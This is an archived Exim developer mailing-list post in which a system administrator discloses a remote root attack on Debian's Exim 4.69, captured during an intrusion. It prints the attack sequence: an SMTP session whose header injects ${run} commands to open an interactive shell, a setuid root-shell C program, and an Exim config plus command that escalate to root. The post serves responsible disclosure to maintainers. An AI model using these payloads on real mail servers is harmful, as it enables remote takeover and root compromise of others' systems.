[exim-dev] Remote root vulnerability in Exim

トップ ページ
このメッセージは次のスレッドの一部です:
M---+-+--+\日付によるスレッドの仕分け
M+\.M\M..MM 
MMM\MMMM.MMPatrick Cernko 、 ->
このメッセージを削除
このメッセージに返信
著者: Sergey Kononenko
日付:  
To: exim-dev
CC: pkg-exim4-maintainers
題目: [exim-dev] Remote root vulnerability in Exim
Hi,

While investigating security break in the network of my company, I've
captured (by tcpdump) sequence of successful remote root attack through
Exim. It was Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
didn't find email of current maintainer of Exim, so I've decided to
write to this mailing lists. I don't want to publish all details of
attack before developers can investigate and fix vulnerability.
So I ask Exim maintainers to contact me and I will send them complete
captured sequence of attack.
Here I can put brief sequence of attack:

EHLO mail.domain.com
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???>
DATA
MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0
....
MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m
HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}}........
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
..........
about 700000 the same strings
..........
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
MAILbombMAILb
.
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???> 

after that attacker gets shell with id of user Debian-exim and cwd
in /var/spool/exim4
then it put file there file setuid with trivial execution of root shell:
int main(int argc, char *argv[])
{
        setuid(0);
        setgid(0);
        setgroups(0, NULL);
        execl("/bin/sh", "sh", NULL);
}


and create another file e.conf with following content:
spool_directory = ${run{/bin/chown
root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}}

the he runs:
exim -Ce.conf -q

and gets suid bit on /var/spool/exim4/setuid
everything else is trivial.

I haven't reproduced remote part of attack, but escalation from Debian-exim to
root works also at exim4-daemon-light 4.72-2 from Debian Squeeze.

With best regards,
Sergey Kononenko.

このメッセージは次のメーリングリストに投稿されました:
Exim-dev
メーリングリスト情報 | となりのメッセージ		<-[exim-dev] [Bug 230] A number of LDAP-related thingsRe: [exim-dev] Remote root vulnerability in Exim->
Tahini and Hummus and Cumin Development Archives サイト管理人: cumin AdminsLurker (バージョン 2.3)